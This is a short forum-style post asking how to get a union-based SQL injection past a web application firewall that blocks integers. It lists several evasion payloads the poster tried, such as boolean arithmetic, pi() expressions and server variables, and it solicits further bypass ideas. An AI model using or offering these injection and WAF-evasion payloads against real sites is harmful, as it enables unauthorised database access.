Hi,
Basically the WAF I run into is blocking any integer representation.
That means that I can't do a basic union based injection using
PHP Code:
union select 1,2-- -
because the WAF automatically detects the integers.
I tried using some hacks like
PHP Code:
union select true,true+true-- - # Doesn't work (standard error)
union select @@log_bin,ceil(pi()*pi()*floor(pi()))-- - # Redirect page (WAF triggered)
union select @@new, coercibility(user())-- - # Redirect page (WAF)
hour(now()) # same
!pi() # same
...
And so on.
So it looks like the WAF checks the GET parameter after the statement was processed.
If you guys have any idea, I'm willing to test.
Thanks,
0 comments:
Post a Comment